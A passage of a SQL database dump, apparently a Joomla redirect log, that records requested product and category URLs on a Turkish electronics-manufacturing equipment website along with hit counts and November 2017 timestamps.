00:00:00',301),(10029,'http://www.3s-technologies.com.tr/tr/urunler/screen-printer',NULL,'','',69,0,'2017-11-08 10:21:43','0000-00-00 00:00:00',301),(10030,'http://3s-technologies.com.tr/index.php/tr/ueruenler/smd-dã¼åÿã¼k-hä±zlä±',NULL,'','',5,0,'2017-11-08 10:29:38','0000-00-00 00:00:00',301),(10031,'http://3s-technologies.com.tr/index.php/tr/ueruenler/flux/dirdesc?language=tr-tr',NULL,'','',13,0,'2017-11-08 10:43:44','0000-00-00 00:00:00',301),(10032,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/asp-300-detail?tmpl=component&print=1',NULL,'','',4,0,'2017-11-08 10:44:25','0000-00-00 00:00:00',301),(10033,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/flux/by,category_name/dirdesc?language=tr-tr',NULL,'','',25,0,'2017-11-08 10:44:45','0000-00-00 00:00:00',301),(10034,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/screen-printer/by,category_name?language=en-gb',NULL,'','',25,0,'2017-11-08 10:47:34','0000-00-00 00:00:00',301),(10035,'http://www.3s-technologies.com.tr/en/products/thru-hole/results,1-10',NULL,'','',2,0,'2017-11-08 10:49:39','0000-00-00 00:00:00',301),(10036,'http://3s-technologies.com.tr/index.php/en/products/krem-lehim-31-32-detail?print=1&tmpl=component',NULL,'','',3,0,'2017-11-08 10:49:51','0000-00-00 00:00:00',301),(10037,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/screen-printer/by,category_name/dirdesc?language=tr-tr',NULL,'','',11,0,'2017-11-08 10:52:54','0000-00-00 00:00:00',301),(10038,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/tel-lehim/by,product_name?error=404&language=en-gb',NULL,'','',1,0,'2017-11-08 10:53:42','0000-00-00 00:00:00',301),(10039,'http://3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/screen-printer',NULL,'','',23,0,'2017-11-08 10:54:02','0000-00-00 00:00:00',301),(10040,'http://www.3s-technologies.com.tr/tr/images/urunler/t_mi300.jpg',NULL,'http://www.3s-technologies.com.tr/tr/%C3%BCr%C3%BCnler/dalga-lehim/mi-300-detail','',154,0,'2017-11-08 10:58:14','0000-00-00 00:00:00',301),(10041,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/tel-lehim/245-k100-28-29-detail',NULL,'','',10,0,'2017-11-08 10:58:17','0000-00-00 00:00:00',301),(10042,'http://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/tel-lehim/275-k100-1.2mm-detail',NULL,'','',9,0,'2017-11-08 11:09:01','0000-00-00 00:00:00',301),(10043,'http://3s-technologies.com.tr/index.php/en/products/bölgesel-lehimleme/by,product_name?language=en-gb',NULL,'','',2,0,'2017-11-08 11:09:07','0000-00-00 00:00:00',301),(10044,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/krem-lehim/krem-lehim-31-detail',NULL,'','',8,0,'2017-11-08 11:09:36','0000-00-00 00:00:00',301),(10045,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/screen-printer/sp-18p-l-detail',NULL,'','',9,0,'2017-11-08 11:09:54','0000-00-00 00:00:00',301),(10046,'http://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/tel-lehim/by,ordering?language=en-gb',NULL,'','',11,0,'2017-11-08 11:11:20','0000-00-00 00:00:00',301),(10047,'http://3s-technologies.com.tr/index.php/en/products/cs40-detail?print=1&tmpl=component',NULL,'','',3,0,'2017-11-08 11:11:42','0000-00-00 00:00:00',301),(10048,'http://3s-technologies.com.tr/index.php/en/products/le-40v-detail?tmpl=component&print=1',NULL,'','',10,0,'2017-11-08 11:11:55','0000-00-00 00:00:00',301),(10049,'http://3s-technologies.com.tr/index.php/en/products/jvk-detail?tmpl=component&print=1',NULL,'','',19,0,'2017-11-08 11:12:08','0000-00-00 00:00:00',301),(10050,'http://3s-technologies.com.tr/index.php/en/products/dalga-lehim/by,product_name?language=en-gb',NULL,'','',17,0,'2017-11-08 11:12:13','0000-00-00 00:00:00',301),(10051,'http://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/spartan12s-400x268_250x250.jpg',NULL,'','',4,0,'2017-11-08 11:18:01','0000-00-00 00:00:00',301),(10052,'http://www.3s-technologies.com.tr/en/products/smd-fırın/dirdesc',NULL,'','',573,0,'2017-11-08 11:30:14','0000-00-00 00:00:00',301),(10053,'http://www.3s-technologies.com.tr/en/products/smd-fırın/by,mf_name',NULL,'','',563,0,'2017-11-08 11:35:25','0000-00-00 00:00:00',301),(10054,'http://3s-technologies.com.tr/index.php/tr/ueruenler/flux/by,category_name?language=tr-tr',NULL,'','',8,0,'2017-11-08 11:38:57','0000-00-00 00:00:00',301),(10055,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/screen-printer/sp-18p-l-detail',NULL,'','',4,0,'2017-11-08 11:40:34','0000-00-00 00:00:00',301),(10056,'http://3s-technologies.com.tr/index.php/en/products/dalga-lehim/by,category_name?language=en-gb',NULL,'','',17,0,'2017-11-08 11:44:29','0000-00-00 00:00:00',301),(10057,'http://3s-technologies.com.tr/tr/images/stories/virtuemart/category/resized/k_kr907_s_250x250.png',NULL,'','',3,0,'2017-11-08 11:45:58','0000-00-00 00:00:00',301),(10058,'http://3s-technologies.com.tr/index.php/en/products/smd-orta-hızlı/by,product_name/dirdesc?language=en-gb',NULL,'','',3,0,'2017-11-08 11:46:21','0000-00-00 00:00:00',301),(10059,'http://www.3s-technologies.com.tr/en/products/smd-fırın/results,1-50',NULL,'','',3,0,'2017-11-08 11:50:36','0000-00-00 00:00:00',301),(10060,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/thru-hole/av132-detail',NULL,'','',1,0,'2017-11-08 11:56:54','0000-00-00 00:00:00',301),(10061,'http://www.3s-technologies.com.tr/en/apple-touch-icon-precomposed.png',NULL,'','',72,0,'2017-11-08 12:13:00','0000-00-00 00:00:00',301),(10062,'http://www.3s-technologies.com.tr/en/apple-touch-icon.png',NULL,'','',72,0,'2017-11-08 12:13:00','0000-00-00 00:00:00',301),(10063,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/sp-18p-l-detail?tmpl=component&print=1',NULL,'','',6,0,'2017-11-08 12:16:05','0000-00-00 00:00:00',301),(10064,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-hızlı/by,ordering?language=en-gb',NULL,'','',3,0,'2017-11-08 12:42:23','0000-00-00 00:00:00',301),(10065,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/çubuk-lehim/dirdesc?language=tr-tr',NULL,'','',2,0,'2017-11-08 12:44:26','0000-00-00 00:00:00',301),(10066,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/çubuk-lehim/by,`p`.product_sku?language=tr-tr',NULL,'','',2,0,'2017-11-08 12:54:19','0000-00-00 00:00:00',301),(10067,'http://3s-technologies.com.tr/index.php/tr/ueruenler/thru-hole/by,product_name?language=tr-tr',NULL,'','',15,0,'2017-11-08 12:59:04','0000-00-00 00:00:00',301),(10068,'http://3s-technologies.com.tr/index.php/en/products/tel-lehim/275-k100-1mm-detail/askquestion?tmpl=component',NULL,'','',8,0,'2017-11-08 13:06:02','0000-00-00 00:00:00',301),(10069,'http://3s-technologies.com.tr/tr/urunler/smd-orta-hızlı/mx200lp-detail',NULL,'','',365,0,'2017-11-08 13:11:19','0000-00-00 00:00:00',301),(10070,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/screen-printer/by,category_name/dirdesc?language=en-gb',NULL,'','',8,0,'2017-11-08 13:15:08','0000-00-00 00:00:00',301),(10071,'http://3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/le40v_400x214_250x250.jpg',NULL,'','',1,0,'2017-11-08 13:18:07','0000-00-00 00:00:00',301),(10072,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/images/stories/virtuemart/category/resized/k_kr907_s_250x250.png',NULL,'','',1,0,'2017-11-08 13:18:39','0000-00-00 00:00:00',301),(10073,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/images/stories/virtuemart/product/resized/le40v_400x214_250x250.jpg',NULL,'','',1,0,'2017-11-08 13:18:43','0000-00-00 00:00:00',301),(10074,'http://3s-technologies.com.tr/index.php/en/products/2.-el-makineler/by,product_name?language=en-gb',NULL,'','',10,0,'2017-11-08 13:38:17','0000-00-00 00:00:00',301),(10075,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/smd-fırın/by,category_name',NULL,'','',384,0,'2017-11-08 13:47:49','0000-00-00 00:00:00',301),(10076,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/smd-fırın/by,category_name/dirdesc',NULL,'','',393,0,'2017-11-08 13:47:51','0000-00-00 00:00:00',301),(10077,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/smd-fırın/by,mf_name',NULL,'','',389,0,'2017-11-08 13:47:57','0000-00-00 00:00:00',301),(10078,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/smd-fırın/by,mf_name/dirdesc',NULL,'','',384,0,'2017-11-08 13:47:59','0000-00-00 00:00:00',301),(10079,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/smd-fırın/by,ordering',NULL,'','',388,0,'2017-11-08 13:48:05','0000-00-00 00:00:00',301),(10080,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/smd-fırın/by,product_name',NULL,'','',385,0,'2017-11-08 13:48:09','0000-00-00 00:00:00',301),(10081,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/smd-fırın/by,product_name/dirdesc',NULL,'','',386,0,'2017-11-08 13:48:11','0000-00-00 00:00:00',301),(10082,'http://3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-hızlı/by,product_sku?language=tr-tr',NULL,'','',1,0,'2017-11-08 13:48:15','0000-00-00 00:00:00',301),(10083,'http://3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-hızlı/dirdesc',NULL,'','',426,0,'2017-11-08 13:48:18','0000-00-00 00:00:00',301),(10084,'http://3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-hızlı/mx200lp-detail',NULL,'','',217,0,'2017-11-08 13:48:25','0000-00-00 00:00:00',301),(10085,'http://3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-hızlı/mx200lp-detail/askquestion?tmpl=component',NULL,'','',216,0,'2017-11-08 13:48:27','0000-00-00 00:00:00',301),(10086,'http://3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-hız',NULL,'','',431,0,'2017-11-08 13:48:31','0000-00-00 00:00:00',301),(10087,'http://3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-hız/by,`p`.product_sku',NULL,'','',417,0,'2017-11-08 13:48:32','0000-00-00 00:00:00',301),(10088,'http://3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-hız/by,product_name',NULL,'','',414,0,'2017-11-08 13:48:34','0000-00-00 00:00:00',301),(10089,'http://3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-hız/by,product_name/dirdesc',NULL,'','',417,0,'2017-11-08 13:48:36','0000-00-00 00:00:00',301),(10090,'http://3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-hız/by,product_sku',NULL,'','',415,0,'2017-11-08 13:48:46','0000-00-00 00:00:00',301),(10091,'http://3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-hız/dirdesc',NULL,'','',409,0,'2017-11-08 13:48:52','0000-00-00 00:00:00',301),(10092,'http://3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-hız/mx200lp-3-detail',NULL,'','',212,0,'2017-11-08 13:48:56','0000-00-00 00:00:00',301),(10093,'http://3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-hız/mx200lp-3-detail/askquestion?tmpl=component',NULL,'','',207,0,'2017-11-08 13:48:57','0000-00-00 00:00:00',301),(10094,'http://3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-hız/npm-detail',NULL,'','',211,0,'2017-11-08 13:48:59','0000-00-00 00:00:00',301),(10095,'http://3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-hız/npm-detail/askquestion?tmpl=component',NULL,'','',207,0,'2017-11-08 13:49:01','0000-00-00 00:00:00',301),(10096,'http://3s-technologies.com.tr/index.php/tr/ueruenler/çubuk-lehim/by,`p`.product_sku',NULL,'','',417,0,'2017-11-08 13:49:09','0000-00-00 00:00:00',301),(10097,'http://3s-technologies.com.tr/index.php/tr/ueruenler/çubuk-lehim/by,`p`.product_sku/dirdesc',NULL,'','',414,0,'2017-11-08 13:49:11','0000-00-00 00:00:00',301),(10098,'http://3s-technologies.com.tr/index.php/tr/ueruenler/çubuk-lehim/by,category_name',NULL,'','',410,0,'2017-11-08 13:49:17','0000-00-00 00:00:00',301),(10099,'http://3s-technologies.com.tr/index.php/tr/ueruenler/çubuk-lehim/by,category_name/dirdesc',NULL,'','',414,0,'2017-11-08 13:49:19','0000-00-00 00:00:00',301),(10100,'http://3s-technologies.com.tr/index.php/tr/ueruenler/çubuk-lehim/by,mf_name',NULL,'','',412,0,'2017-11-08 13:49:27','0000-00-00 00:00:00',301),(10101,'http://3s-technologies.com.tr/index.php/tr/ueruenler/çubuk-lehim/by,mf_name/dirdesc',NULL,'','',411,0,'2017-11-08 13:49:29','0000-00-00 00:00:00',301),(10102,'http://3s-technologies.com.tr/en/products',NULL,'','',41,0,'2017-11-08 13:49:30','0000-00-00 00:00:00',301),(10103,'http://3s-technologies.com.tr/index.php/tr/ueruenler/çubuk-lehim/by,ordering',NULL,'','',400,0,'2017-11-08 13:49:36','0000-00-00 00:00:00',301),(10104,'http://3s-technologies.com.tr/index.php/tr/ueruenler/çubuk-lehim/by,product_name',NULL,'','',405,0,'2017-11-08 13:49:39','0000-00-00 00:00:00',301),(10105,'http://3s-technologies.com.tr/index.php/tr/ueruenler/çubuk-lehim/by,product_name/dirdesc',NULL,'','',405,0,'2017-11-08 13:49:41','0000-00-00 00:00:00',301),(10106,'http://3s-technologies.com.tr/index.php/tr/ueruenler/çubuk-lehim/by,product_sku',NULL,'','',403,0,'2017-11-08 13:49:48','0000-00-00 00:00:00',301),(10107,'http://3s-technologies.com.tr/index.php/tr/ueruenler/çubuk-lehim/dirdesc',NULL,'','',407,0,'2017-11-08 13:49:54','0000-00-00 00:00:00',301),(10108,'http://3s-technologies.com.tr/index.php/tr/ueruenler/çubuk-lehim/e-bar-26-detail',NULL,'','',206,0,'2017-11-08 13:49:57','0000-00-00 00:00:00',301),(10109,'http://3s-technologies.com.tr/index.php/tr/ueruenler/çubuk-lehim/e-bar-26-detail/askquestion?tmpl=component',NULL,'','',205,0,'2017-11-08 13:49:59','0000-00-00 00:00:00',301),(10110,'http://3s-technologies.com.tr/index.php/tr/ueruenler/çubuk-lehim/e-bar-detail',NULL,'','',206,0,'2017-11-08 13:50:01','0000-00-00 00:00:00',301),(10111,'http://3s-technologies.com.tr/index.php/tr/ueruenler/çubuk-lehim/e-bar-detail/askquestion?tmpl=component',NULL,'','',212,0,'2017-11-08 13:50:03','0000-00-00 00:00:00',301),(10112,'http://3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/smd-fırın/by,product_name',NULL,'','',371,0,'2017-11-08 13:50:11','0000-00-00 00:00:00',301),(10113,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/smd-fırın/by,category_name/dirdesc?language=en-gb',NULL,'','',1,0,'2017-11-08 13:50:15','0000-00-00 00:00:00',301),(10114,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/smd-fırın/by,category_name?language=en-gb',NULL,'','',1,0,'2017-11-08 13:50:17','0000-00-00 00:00:00',301),(10115,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/smd-fırın/by,mf_name',NULL,'','',587,0,'2017-11-08 13:50:19','0000-00-00 00:00:00',301),(10116,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/smd-fırın/by,mf_name/dirdesc',NULL,'','',545,0,'2017-11-08 13:50:21','0000-00-00 00:00:00',301),(10117,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/smd-fırın/by,ordering',NULL,'','',543,0,'2017-11-08 13:50:27','0000-00-00 00:00:00',301),(10118,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/smd-fırın/by,pc.ordering,product_name/dirdesc',NULL,'','',549,0,'2017-11-08 13:50:34','0000-00-00 00:00:00',301),(10119,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/smd-fırın/by,pc.ordering,product_name?language=en-gb',NULL,'','',1,0,'2017-11-08 13:50:38','0000-00-00 00:00:00',301),(10120,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/smd-fırın/by,product_name',NULL,'','',617,0,'2017-11-08 13:50:40','0000-00-00 00:00:00',301),(10121,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/smd-fırın/by,product_name/dirdesc',NULL,'','',574,0,'2017-11-08 13:50:42','0000-00-00 00:00:00',301),(10122,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/smd-fırın/by,product_sku',NULL,'','',611,0,'2017-11-08 13:50:49','0000-00-00 00:00:00',301),(10123,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/smd-fırın/dirdesc',NULL,'','',611,0,'2017-11-08 13:50:52','0000-00-00 00:00:00',301),(10124,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/smd-fırın?language=en-gb',NULL,'','',1,0,'2017-11-08 13:51:00','0000-00-00 00:00:00',301),(10125,'http://www.3s-technologies.com.tr/en/products/smd-düşük-hızlı/by,`p`.product_sku',NULL,'','',581,0,'2017-11-08 13:51:04','0000-00-00 00:00:00',301),(10126,'http://www.3s-technologies.com.tr/en/products/smd-düşük-hızlı/by,`p`.product_sku/dirdesc',NULL,'','',578,0,'2017-11-08 13:51:06','0000-00-00 00:00:00',301),(10127,'http://www.3s-technologies.com.tr/en/products/smd-düşük-hızlı/by,category_name',NULL,'','',599,0,'2017-11-08 13:51:11','0000-00-00 00:00:00',301),(10128,'http://www.3s-technologies.com.tr/en/products/smd-düşük-hızlı/by,category_name/dirdesc',NULL,'','',574,0,'2017-11-08 13:51:13','0000-00-00 00:00:00',301),(10129,'http://www.3s-technologies.com.tr/en/products/smd-düşük-hızlı/by,mf_name',NULL,'','',615,0,'2017-11-08 13:51:21','0000-00-00 00:00:00',301),(10130,'http://www.3s-technologies.com.tr/en/products/smd-düşük-hızlı/by,mf_name/dirdesc',NULL,'','',575,0,'2017-11-08 13:51:23','0000-00-00 00:00:00',301),(10131,'http://www.3s-technologies.com.tr/en/products/smd-düşük-hızlı/by,ordering',NULL,'','',577,0,'2017-11-08 13:51:32','0000-00-00 00:00:00',301),(10132,'http://www.3s-technologies.com.tr/en/products/smd-düşük-hızlı/by,pc.ordering,product_name',NULL,'','',567,0,'2017-11-08 13:51:35','0000-00-00 00:00:00',301),(10133,'http://www.3s-technologies.com.tr/en/products/smd-düşük-hızlı/by,pc.ordering,product_name/dirdesc',NULL,'','',586,0,'2017-11-08 13:51:38','0000-00-00 00:00:00',301),(10134,'http://www.3s-technologies.com.tr/en/products/smd-düşük-hızlı/by,product_name/dirdesc',NULL,'','',575,0,'2017-11-08 13:51:48','0000-00-00 00:00:00',301),(10135,'http://www.3s-technologies.com.tr/en/products/smd-düşük-hızlı/by,product_sku',NULL,'','',589,0,'2017-11-08 13:51:54','0000-00-00 00:00:00',301),(10136,'http://www.3s-technologies.com.tr/en/products/smd-düşük-hızlı/cs40-detail',NULL,'','',323,0,'2017-11-08 13:52:00','0000-00-00 00:00:00',301),(10137,'http://www.3s-technologies.com.tr/en/products/smd-düşük-hızlı/cs40-detail/askquestion?tmpl=component',NULL,'','',319,0,'2017-11-08 13:52:02','0000-00-00 00:00:00',301),(10138,'http://www.3s-technologies.com.tr/en/products/smd-düşük-hızlı/dirdesc',NULL,'','',589,0,'2017-11-08 13:52:06','0000-00-00 00:00:00',301),(10139,'http://www.3s-technologies.com.tr/en/products/smd-düşük-hızlı/le-40v-detail',NULL,'','',345,0,'2017-11-08 13:52:09','0000-00-00 00:00:00',301),(10140,'http://www.3s-technologies.com.tr/en/products/smd-düşük-hızlı/ls60v-detail/askquestion?tmpl=component',NULL,'','',296,0,'2017-11-08 13:52:15','0000-00-00 00:00:00',301),(10141,'http://www.3s-technologies.com.tr/en/products/smd-fırın/by,`p`.product_sku',NULL,'','',551,0,'2017-11-08 13:52:26','0000-00-00 00:00:00',301),(10142,'http://www.3s-technologies.com.tr/en/products/smd-fırın/by,`p`.product_sku/dirdesc',NULL,'','',551,0,'2017-11-08 13:52:28','0000-00-00 00:00:00',301),(10143,'http://www.3s-technologies.com.tr/en/products/smd-fırın/by,category_name',NULL,'','',601,0,'2017-11-08 13:52:35','0000-00-00 00:00:00',301),(10144,'http://www.3s-technologies.com.tr/en/products/smd-fırın/by,category_name/dirdesc',NULL,'','',559,0,'2017-11-08 13:52:37','0000-00-00 00:00:00',301),(10145,'http://www.3s-technologies.com.tr/en/products/smd-fırın/by,mf_name/dirdesc',NULL,'','',549,0,'2017-11-08 13:52:47','0000-00-00 00:00:00',301),(10146,'http://www.3s-technologies.com.tr/en/products/smd-fırın/by,ordering',NULL,'','',540,0,'2017-11-08 13:52:55','0000-00-00 00:00:00',301),(10147,'http://www.3s-technologies.com.tr/en/products/smd-fırın/by,pc.ordering,product_name',NULL,'','',545,0,'2017-11-08 13:52:59','0000-00-00 00:00:00',301),(10148,'http://www.3s-technologies.com.tr/en/products/smd-fırın/by,pc.ordering,product_name/dirdesc',NULL,'','',535,0,'2017-11-08 13:53:02','0000-00-00 00:00:00',301),(10149,'http://www.3s-technologies.com.tr/en/products/smd-fırın/by,product_name',NULL,'','',577,0,'2017-11-08 13:53:12','0000-00-00 00:00:00',301),(10150,'http://www.3s-technologies.com.tr/en/products/smd-fırın/by,product_name/dirdesc',NULL,'','',542,0,'2017-11-08 13:53:14','0000-00-00 00:00:00',301),(10151,'http://www.3s-technologies.com.tr/en/products/smd-fırın/by,product_sku',NULL,'','',560,0,'2017-11-08 13:53:19','0000-00-00 00:00:00',301),(10152,'http://www.3s-technologies.com.tr/en/products/smd-fırın/gf-12-hc-ht-detail',NULL,'','',306,0,'2017-11-08 13:53:32','0000-00-00 00:00:00',301),(10153,'http://www.3s-technologies.com.tr/en/products/smd-fırın/gf-12-hc-ht-detail/askquestion?tmpl=component',NULL,'','',284,0,'2017-11-08 13:53:34','0000-00-00 00:00:00',301),(10154,'http://www.3s-technologies.com.tr/en/products/smd-fırın/ly-8c-detail',NULL,'','',321,0,'2017-11-08 13:53:36','0000-00-00 00:00:00',301),(10155,'http://www.3s-technologies.com.tr/en/products/smd-fırın/ly-8c-detail/askquestion?tmpl=component',NULL,'','',291,0,'2017-11-08 13:53:39','0000-00-00 00:00:00',301),(10156,'http://www.3s-technologies.com.tr/en/products/smd-orta-hızlı/am100-detail',NULL,'','',303,0,'2017-11-08 13:53:46','0000-00-00 00:00:00',301),(10157,'http://www.3s-technologies.com.tr/en/products/smd-orta-hızlı/am100-detail/askquestion?tmpl=component',NULL,'','',276,0,'2017-11-08 13:53:53','0000-00-00 00:00:00',301),(10158,'http://www.3s-technologies.com.tr/en/products/smd-orta-hızlı/by,`p`.product_sku',NULL,'','',534,0,'2017-11-08 13:53:55','0000-00-00 00:00:00',301),(10159,'http://www.3s-technologies.com.tr/en/products/smd-orta-hızlı/by,`p`.product_sku/dirdesc',NULL,'','',509,0,'2017-11-08 13:53:58','0000-00-00 00:00:00',301),(10160,'http://www.3s-technologies.com.tr/en/products/smd-orta-hızlı/by,category_name/dirdesc',NULL,'','',524,0,'2017-11-08 13:54:08','0000-00-00 00:00:00',301),(10161,'http://www.3s-technologies.com.tr/en/products/smd-orta-hızlı/by,mf_name',NULL,'','',582,0,'2017-11-08 13:54:17','0000-00-00 00:00:00',301),(10162,'http://www.3s-technologies.com.tr/en/products/smd-orta-hızlı/by,mf_name/dirdesc',NULL,'','',525,0,'2017-11-08 13:54:19','0000-00-00 00:00:00',301),(10163,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/tel-lehim/245-k100-28-29-detail',NULL,'','',28,0,'2017-11-08 13:54:24','0000-00-00 00:00:00',301),(10164,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/tel-lehim/275-k100-1.2mm-detail',NULL,'','',27,0,'2017-11-08 13:54:29','0000-00-00 00:00:00',301),(10165,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/tel-lehim/275-k100-1mm-detail',NULL,'','',25,0,'2017-11-08 13:54:31','0000-00-00 00:00:00',301),(10166,'http://3s-technologies.com.tr/en/products/smd-ultra-hız/mx200lp-3-detail/askquestion?tmpl=component',NULL,'','',208,0,'2017-11-08 13:59:18','0000-00-00 00:00:00',301),(10167,'http://3s-technologies.com.tr/index.php/en/products/spartan-8s-8d-detail?tmpl=component&print=1',NULL,'','',18,0,'2017-11-08 14:00:58','0000-00-00 00:00:00',301),(10168,'http://www.3s-technologies.com.tr/en/products/smd-düşük-hızlı/results,1-10',NULL,'','',2,0,'2017-11-08 14:08:05','0000-00-00 00:00:00',301),(10169,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/tel-lehim/results,1-10',NULL,'','',2,0,'2017-11-08 14:23:26','0000-00-00 00:00:00',301),(10170,'http://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/tel-lehim/by,product_name?language=en-gb',NULL,'','',9,0,'2017-11-08 14:23:32','0000-00-00 00:00:00',301),(10171,'http://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/tel-lehim/by,category_name?error=404&language=en-gb',NULL,'','',1,0,'2017-11-08 14:26:07','0000-00-00 00:00:00',301),(10172,'http://3s-technologies.com.tr/tr/urunler/smd-fırın/dirdesc',NULL,'','',375,0,'2017-11-08 14:36:06','0000-00-00 00:00:00',301),(10173,'http://3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/tel-lehim/245-sn63pb37-0.8mm-detail',NULL,'','',10,0,'2017-11-08 14:47:07','0000-00-00 00:00:00',301),(10174,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/flux/by,product_name',NULL,'','',50,0,'2017-11-08 15:19:27','0000-00-00 00:00:00',301),(10175,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-hız/by,category_name/dirdesc?language=en-gb',NULL,'','',2,0,'2017-11-08 15:20:41','0000-00-00 00:00:00',301),(10176,'http://www.3s-technologies.com.tr/en/products/smd-dã¼åÿã¼k-hä±zlä±/le-40v-detail',NULL,'','',13,0,'2017-11-08 15:31:59','0000-00-00 00:00:00',301),(10177,'http://3s-technologies.com.tr/index.php/en/products/2.-el-makineler/by,mf_name/dirdesc?language=en-gb',NULL,'','',15,0,'2017-11-08 15:35:49','0000-00-00 00:00:00',301),(10178,'http://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/krem-lehim/krem-lehim-31-32-33-detail',NULL,'','',14,0,'2017-11-08 15:41:20','0000-00-00 00:00:00',301),(10179,'http://3s-technologies.com.tr/tr/urunler/smd-düşük-hızlı/le-40v-detail',NULL,'','',389,0,'2017-11-08 15:44:54','0000-00-00 00:00:00',301),(10180,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=168&itemid=58&lang=tr',NULL,'','',5,0,'2017-11-08 15:44:57','0000-00-00 00:00:00',301),(10181,'http://www.3s-technologies.com.tr/en/products/bölgesel-lehimleme/results,1-5',NULL,'','',2,0,'2017-11-08 15:55:19','0000-00-00 00:00:00',301),(10182,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/dalga-lehim',NULL,'','',48,0,'2017-11-08 16:00:14','0000-00-00 00:00:00',301),(10183,'http://www.3s-technologies.com.tr/tr/hakkimizda',NULL,'','',66,0,'2017-11-08 16:10:33','0000-00-00 00:00:00',301),(10184,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/krem-lehim/by,mf_name/dirdesc?language=tr-tr',NULL,'','',24,0,'2017-11-08 16:18:03','0000-00-00 00:00:00',301),(10185,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/dirdesc',NULL,'','',409,0,'2017-11-08 16:31:11','0000-00-00 00:00:00',301),(10186,'http://www.3s-technologies.com.tr/en/products/smd-ultra-hız/mx200lp-3-detail',NULL,'','',325,0,'2017-11-08 16:41:13','0000-00-00 00:00:00',301),(10187,'http://www.3s-technologies.com.tr/en/products/ess-310-detail?tmpl=component&print=1',NULL,'','',41,0,'2017-11-08 16:51:13','0000-00-00 00:00:00',301),(10188,'http://3s-technologies.com.tr/index.php/tr/ueruenler/2.-el-makineler/rh2-detail',NULL,'','',8,0,'2017-11-08 16:53:32','0000-00-00 00:00:00',301),(10189,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-hızlı/by,product_name/dirdesc?language=tr-tr',NULL,'','',2,0,'2017-11-08 16:56:55','0000-00-00 00:00:00',301),(10190,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/bölgesel-lehimleme/ess-310-detail',NULL,'','',5,0,'2017-11-08 17:01:14','0000-00-00 00:00:00',301),(10191,'http://3s-technologies.com.tr/index.php/en/products/krem-lehim-31-32-33-detail?tmpl=component&print=1',NULL,'','',11,0,'2017-11-08 17:02:15','0000-00-00 